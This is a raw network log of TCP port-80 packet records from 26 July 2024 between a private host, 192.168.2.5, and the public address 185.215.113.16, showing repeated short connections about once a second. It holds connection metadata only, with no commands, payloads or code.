Jul 26, 2024 20:58:16.197505951 CEST	80	49721	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:16.442387104 CEST	80	49721	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:16.442523003 CEST	49721	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:16.559012890 CEST	49721	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:16.559427023 CEST	49722	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:16.565608025 CEST	80	49722	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:16.565701962 CEST	49722	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:16.565855026 CEST	49722	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:16.566076040 CEST	80	49721	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:16.566147089 CEST	49721	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:16.572532892 CEST	80	49722	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:17.307715893 CEST	80	49722	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:17.307789087 CEST	49722	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:17.309178114 CEST	49722	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:17.314141989 CEST	80	49722	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:17.553746939 CEST	80	49722	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:17.553817987 CEST	49722	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:17.671730995 CEST	49722	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:17.672106028 CEST	49723	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:17.676932096 CEST	80	49723	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:17.677197933 CEST	49723	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:17.677347898 CEST	80	49722	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:17.677376032 CEST	49723	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:17.677433014 CEST	49722	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:17.682276964 CEST	80	49723	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:18.517805099 CEST	80	49723	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:18.517862082 CEST	49723	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:18.518637896 CEST	49723	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:18.523817062 CEST	80	49723	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:18.772489071 CEST	80	49723	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:18.772595882 CEST	49723	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:18.886987925 CEST	49723	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:18.888047934 CEST	49724	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:18.893332005 CEST	80	49724	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:18.893362999 CEST	80	49723	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:18.893471003 CEST	49723	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:18.893523932 CEST	49724	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:18.893556118 CEST	49724	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:18.898499012 CEST	80	49724	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:19.644718885 CEST	80	49724	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:19.644954920 CEST	49724	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:19.645601988 CEST	49724	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:19.650654078 CEST	80	49724	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:19.896271944 CEST	80	49724	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:19.896409988 CEST	49724	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:20.012271881 CEST	49724	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:20.012789965 CEST	49725	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:20.021606922 CEST	80	49724	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:20.021667957 CEST	49724	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:20.021740913 CEST	80	49725	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:20.021811962 CEST	49725	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:20.021992922 CEST	49725	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:20.030760050 CEST	80	49725	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:20.789779902 CEST	80	49725	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:20.790025949 CEST	49725	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:20.790970087 CEST	49725	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:20.795799017 CEST	80	49725	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:21.045649052 CEST	80	49725	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:21.045736074 CEST	49725	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:21.154143095 CEST	49725	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:21.154449940 CEST	49726	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:21.159229040 CEST	80	49726	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:21.159302950 CEST	49726	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:21.159318924 CEST	80	49725	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:21.159373999 CEST	49725	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:21.159559011 CEST	49726	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:21.164274931 CEST	80	49726	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:21.907143116 CEST	80	49726	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:21.907229900 CEST	49726	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:21.907841921 CEST	49726	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:21.915141106 CEST	80	49726	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:22.156018972 CEST	80	49726	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:22.156101942 CEST	49726	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:22.271168947 CEST	49726	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:22.271642923 CEST	49727	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:22.279094934 CEST	80	49727	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:22.279129982 CEST	80	49726	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:22.279287100 CEST	49726	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:22.279321909 CEST	49727	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:22.279495001 CEST	49727	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:22.287657976 CEST	80	49727	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:23.036001921 CEST	80	49727	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:23.036077023 CEST	49727	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:23.058140039 CEST	49727	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:23.063224077 CEST	80	49727	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:23.315845966 CEST	80	49727	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:23.315951109 CEST	49727	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:23.418543100 CEST	49727	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:23.418819904 CEST	49728	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:23.423721075 CEST	80	49728	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:23.423841953 CEST	49728	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:23.423939943 CEST	49728	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:23.423968077 CEST	80	49727	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:23.424088001 CEST	49727	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:23.428862095 CEST	80	49728	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:24.226958990 CEST	80	49728	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:24.227035999 CEST	49728	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:24.227797031 CEST	49728	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:24.232609987 CEST	80	49728	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:24.479841948 CEST	80	49728	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:24.479980946 CEST	49728	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:24.590362072 CEST	49728	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:24.590758085 CEST	49729	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:24.595846891 CEST	80	49729	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:24.595984936 CEST	49729	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:24.596080065 CEST	49729	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:24.596155882 CEST	80	49728	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:24.596210957 CEST	49728	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:24.600904942 CEST	80	49729	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:25.371866941 CEST	80	49729	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:25.372025967 CEST	49729	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:25.372769117 CEST	49729	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:25.377861023 CEST	80	49729	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:25.629643917 CEST	80	49729	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:25.629723072 CEST	49729	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:25.731000900 CEST	49729	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:25.731298923 CEST	49730	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:25.736241102 CEST	80	49730	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:25.736334085 CEST	49730	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:25.736355066 CEST	80	49729	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:25.736418009 CEST	49729	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:25.736569881 CEST	49730	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:25.741322041 CEST	80	49730	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:26.518021107 CEST	80	49730	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:26.518116951 CEST	49730	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:26.518990040 CEST	49730	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:26.524399042 CEST	80	49730	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:26.769520044 CEST	80	49730	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:26.769674063 CEST	49730	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:26.871921062 CEST	49730	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:26.872308016 CEST	49731	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:26.877203941 CEST	80	49731	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:26.877295971 CEST	49731	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:26.877465010 CEST	49731	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:26.877542019 CEST	80	49730	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:26.877604008 CEST	49730	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:26.882250071 CEST	80	49731	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:27.681642056 CEST	80	49731	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:27.681869984 CEST	49731	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:27.682790041 CEST	49731	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:27.687633991 CEST	80	49731	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:27.965060949 CEST	80	49731	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:27.965225935 CEST	49731	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:28.074986935 CEST	49731	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:28.075267076 CEST	49732	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:28.083285093 CEST	80	49732	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:28.083395004 CEST	49732	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:28.083575964 CEST	49732	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:28.084597111 CEST	80	49731	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:28.084671021 CEST	49731	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:28.089071035 CEST	80	49732	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:28.837975979 CEST	80	49732	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:28.838056087 CEST	49732	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:28.838609934 CEST	49732	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:28.843534946 CEST	80	49732	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:29.086675882 CEST	80	49732	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:29.086740971 CEST	49732	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:29.199805021 CEST	49732	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:29.200217009 CEST	49733	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:29.436992884 CEST	80	49733	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:29.437012911 CEST	80	49732	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:29.437092066 CEST	49733	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:29.437110901 CEST	49732	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:29.437333107 CEST	49733	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:29.444691896 CEST	80	49733	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:30.214293957 CEST	80	49733	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:30.214518070 CEST	49733	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:30.215038061 CEST	49733	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:30.219902992 CEST	80	49733	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:30.466254950 CEST	80	49733	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:30.466556072 CEST	49733	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:30.574924946 CEST	49733	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:30.575136900 CEST	49734	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:30.580133915 CEST	80	49734	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:30.580282927 CEST	49734	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:30.580513954 CEST	49734	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:30.580763102 CEST	80	49733	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:30.580830097 CEST	49733	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:30.585366964 CEST	80	49734	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:31.535506010 CEST	80	49734	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:31.535607100 CEST	49734	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:31.567679882 CEST	49734	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:31.575809956 CEST	80	49734	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:31.822416067 CEST	80	49734	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:31.822540998 CEST	49734	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:31.949645042 CEST	49734	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:31.949997902 CEST	49735	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:32.139899969 CEST	80	49735	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:32.140001059 CEST	49735	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:32.140187979 CEST	49735	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:32.141088963 CEST	80	49734	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:32.141258955 CEST	49734	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:32.147289038 CEST	80	49735	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:33.206010103 CEST	80	49735	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:33.206082106 CEST	49735	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:33.206834078 CEST	49735	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:33.209753990 CEST	80	49735	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:33.209803104 CEST	49735	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:33.211635113 CEST	80	49735	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:33.457551003 CEST	80	49735	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:33.457653999 CEST	49735	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:33.586309910 CEST	49735	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:33.586653948 CEST	49736	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:33.592715025 CEST	80	49736	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:33.592792988 CEST	49736	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:33.592839003 CEST	80	49735	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:33.592896938 CEST	49735	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:33.597733021 CEST	49736	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:33.602564096 CEST	80	49736	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:34.359983921 CEST	80	49736	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:34.360101938 CEST	49736	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:34.386220932 CEST	49736	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:34.391078949 CEST	80	49736	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:34.635875940 CEST	80	49736	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:34.635976076 CEST	49736	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:34.746589899 CEST	49736	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:34.746845007 CEST	49737	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:34.752057076 CEST	80	49737	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:34.752155066 CEST	49737	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:34.752285004 CEST	80	49736	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:34.752319098 CEST	49737	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:34.752356052 CEST	49736	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:34.757507086 CEST	80	49737	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:35.517978907 CEST	80	49737	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:35.518083096 CEST	49737	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:35.518920898 CEST	49737	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:35.524921894 CEST	80	49737	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:35.767812967 CEST	80	49737	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:35.768004894 CEST	49737	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:35.871620893 CEST	49737	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:35.872102022 CEST	49738	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:35.877057076 CEST	80	49738	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:35.877173901 CEST	49738	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:35.877249002 CEST	80	49737	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:35.877319098 CEST	49737	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:35.877474070 CEST	49738	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:35.882292032 CEST	80	49738	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:36.679044008 CEST	80	49738	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:36.679297924 CEST	49738	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:36.702434063 CEST	49738	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:36.707518101 CEST	80	49738	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:36.970082045 CEST	80	49738	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:36.970272064 CEST	49738	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:37.105909109 CEST	49738	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:37.106360912 CEST	49739	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:37.111891031 CEST	80	49739	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:37.112011909 CEST	49739	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:37.112205982 CEST	49739	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:37.112776995 CEST	80	49738	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:37.112844944 CEST	49738	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:37.117177010 CEST	80	49739	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:38.321544886 CEST	80	49739	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:38.321683884 CEST	49739	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:38.323770046 CEST	80	49739	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:38.323879957 CEST	49739	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:38.324192047 CEST	80	49739	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:38.324244976 CEST	49739	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:38.325314999 CEST	49739	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:38.636431932 CEST	49739	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:38.672384977 CEST	80	49739	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:38.672399044 CEST	80	49739	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:38.914558887 CEST	80	49739	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:38.914700031 CEST	49739	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:39.031855106 CEST	49739	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:39.032280922 CEST	49740	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:39.037156105 CEST	80	49740	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:39.037233114 CEST	49740	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:39.037410021 CEST	49740	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:39.038239002 CEST	80	49739	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:39.038300037 CEST	49739	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:39.042196035 CEST	80	49740	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:39.808726072 CEST	80	49740	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:39.809003115 CEST	49740	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:39.828140974 CEST	49740	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:39.833023071 CEST	80	49740	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:40.081197977 CEST	80	49740	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:40.081305981 CEST	49740	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:40.185904026 CEST	49740	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:40.186207056 CEST	49741	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:40.191148996 CEST	80	49741	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:40.191633940 CEST	80	49740	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:40.191696882 CEST	49741	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:40.191721916 CEST	49740	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:40.191844940 CEST	49741	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:40.196620941 CEST	80	49741	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:40.993140936 CEST	80	49741	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:40.993438005 CEST	49741	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:40.994426012 CEST	49741	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:41.000299931 CEST	80	49741	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:41.247082949 CEST	80	49741	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:41.247163057 CEST	49741	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:41.356236935 CEST	49741	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:41.356587887 CEST	49742	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:41.361460924 CEST	80	49742	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:41.361618996 CEST	49742	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:41.361785889 CEST	80	49741	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:41.361818075 CEST	49742	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:41.361852884 CEST	49741	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:41.366770029 CEST	80	49742	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:42.116513014 CEST	80	49742	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:42.116626024 CEST	49742	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:42.117451906 CEST	49742	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:42.122292042 CEST	80	49742	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:42.366312027 CEST	80	49742	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:42.366425037 CEST	49742	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:42.480954885 CEST	49742	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:42.481368065 CEST	49743	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:42.486296892 CEST	80	49743	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:42.486381054 CEST	49743	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:42.486433983 CEST	80	49742	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:42.486490011 CEST	49742	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:42.486658096 CEST	49743	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:42.491442919 CEST	80	49743	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:43.253310919 CEST	80	49743	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:43.253381014 CEST	49743	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:43.254023075 CEST	49743	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:43.258939981 CEST	80	49743	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:43.516658068 CEST	80	49743	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:43.516745090 CEST	49743	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:43.621869087 CEST	49743	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:43.622137070 CEST	49744	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:43.627270937 CEST	80	49744	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:43.627330065 CEST	49744	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:43.627337933 CEST	80	49743	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:43.627382994 CEST	49743	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:43.628052950 CEST	49744	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:43.632996082 CEST	80	49744	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:44.378709078 CEST	80	49744	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:44.378783941 CEST	49744	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:44.379667997 CEST	49744	80	192.168.2.5	185.215.113.16
Jul 26, 2024 20:58:44.384762049 CEST	80	49744	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:44.626416922 CEST	80	49744	185.215.113.16	192.168.2.5
Jul 26, 2024 20:58:44.626486063 CEST	49744	80	192.168.2.5	185.215.113.16
